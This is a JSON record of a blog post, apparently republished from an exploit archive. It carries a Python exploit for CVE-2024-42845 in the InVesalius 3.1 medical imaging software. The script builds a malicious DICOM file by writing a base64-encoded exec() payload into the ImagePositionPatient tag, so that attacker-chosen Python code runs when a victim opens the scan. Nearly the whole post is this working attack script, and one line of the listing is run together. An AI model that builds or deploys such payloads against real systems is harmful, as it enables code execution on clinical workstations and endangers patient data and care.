{"id":59155,"date":"2024-08-26T18:20:22","date_gmt":"2024-08-26T15:20:22","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180378\/invesalius3199980-exec.txt"},"modified":"2024-08-26T18:20:22","modified_gmt":"2024-08-26T15:20:22","slug":"invesalius-3-1-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/invesalius-3-1-remote-code-execution\/","title":{"rendered":"Invesalius 3.1 Remote Code Execution"},"content":{"rendered":"<p># Exploit Title: Invesalius 3.1 &#8211; Remote Code Execution (RCE)<br \/># Discovered By: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)<br \/># Exploit Author: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)<br \/># Vendor Homepage: https:\/\/invesalius.github.io\/<br \/># Software Link: https:\/\/github.com\/invesalius\/invesalius3\/tree\/master\/invesalius<br \/># Version: 3.1.99991 to 3.1.99998<br \/># Tested on: Windows<br \/># CVE-ID: CVE-2024-42845<br \/># External references: https:\/\/www.partywave.site\/show\/research\/Tic%20TAC%20-%20Beware%20of%20your%20scan, https:\/\/notes.sfoffo.com\/contributions\/2024-contributions\/cve-2024-42845<\/p>\n<p>###<br \/># exploit to create the malicious DICOM file<br \/>###<\/p>\n<p>import pydicom<br \/>import base64<br \/>import argparse<\/p>\n<p>pydicom.config.settings.reading_validation_mode = pydicom.config.IGNORE<\/p>\n<p>def encode_payload(plain_payload):<br \/>data = open(plain_payload, &#8216;rb&#8217;).read()<br \/>return f&#8221;exec(__import__(&#8216;base64&#8217;).b64decode({base64.b64encode(data)})&#8221;<\/p>\n<p>def prepare_dicom_payload(dicom_file_path, sign, payload):<br \/>try:<br \/>dicom_data = pydicom.dcmread(dicom_file_path)<br \/>if sign:<br \/>dicom_data.Manufacturer = &#8220;Malicious DICOM file creator&#8221;<br \/>dicom_data.InstitutionName = &#8220;Malicious DICOM file institution&#8221;<\/p>\n<p>values = dicom_data[0x0020, 0x0032].value<br \/>mal = [str(i) for i in values]mal.append(encode_payload(payload))<\/p>\n<p>except pydicom.errors.InvalidDicomError:<br \/>print(&#8220;The file is not a valid DICOM file.&#8221;)<br \/>except Exception as e:<br \/>print(f&#8221;An error occurred: {e}&#8221;)<\/p>\n<p>return mal<\/p>\n<p>def modify_dicom_field(dicom_file_path, malicious_tag, outfile):<br \/>try:<br \/>dicom_dataset = pydicom.dcmread(dicom_file_path)<br \/>elem = pydicom.dataelem.DataElement(0x00200032, &#8216;CS&#8217;, malicious_tag)<br \/>dicom_dataset[0x00200032] = elem<br \/>print(dicom_dataset)<br \/>dicom_dataset.save_as(outfile)<br \/>except Exception as e:<br \/>print(f&#8221;An error occurred: {e}&#8221;)<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>parser = argparse.ArgumentParser(description=&#8217;Read a DICOM file.&#8217;)<br \/>parser.add_argument(&#8216;&#8211;dicom&#8217;, required=True, help=&#8217;Path to the input DICOM file&#8217;)<br \/>parser.add_argument(&#8216;&#8211;outfile&#8217;, required=True, help=&#8217;Path to the output DICOM file&#8217;)<br \/>parser.add_argument(&#8216;&#8211;payload&#8217;, required=False, default=b&#8221;print(&#8216;Test&#8217;)&#8221;, help=&#8217;File that contains the malicious plain python3 code&#8217;)<br \/>parser.add_argument(&#8216;&#8211;signature&#8217;, required=False, default=True)<\/p>\n<p>args = parser.parse_args()<br \/>dicom_infile_path = args.dicom<br \/>dicom_outfile_path = args.outfile<\/p>\n<p>tmp_tag = prepare_dicom_payload(dicom_infile_path, sign=args.signature, payload=args.payload)<br \/>if tmp_tag:<br \/>malicious_tag = &#8216;\\\\&#8217;.join(tmp_tag)<\/p>\n<p>modify_dicom_field(dicom_infile_path, malicious_tag, dicom_outfile_path)<br \/>exit(0)<br \/>else:<br \/>exit(1)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Invesalius 3.1 &#8211; Remote Code Execution (RCE)# Discovered By: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)# Exploit Author: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)# Vendor Homepage: https:\/\/invesalius.github.io\/# Software Link: https:\/\/github.com\/invesalius\/invesalius3\/tree\/master\/invesalius# Version: 3.1.99991 to 3.1.99998# Tested on: Windows# CVE-ID: CVE-2024-42845# External references: https:\/\/www.partywave.site\/show\/research\/Tic%20TAC%20-%20Beware%20of%20your%20scan, https:\/\/notes.sfoffo.com\/contributions\/2024-contributions\/cve-2024-42845 #### exploit to create the malicious DICOM file### &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59155","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59155","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59155"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59155\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59155"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59155"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59155"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}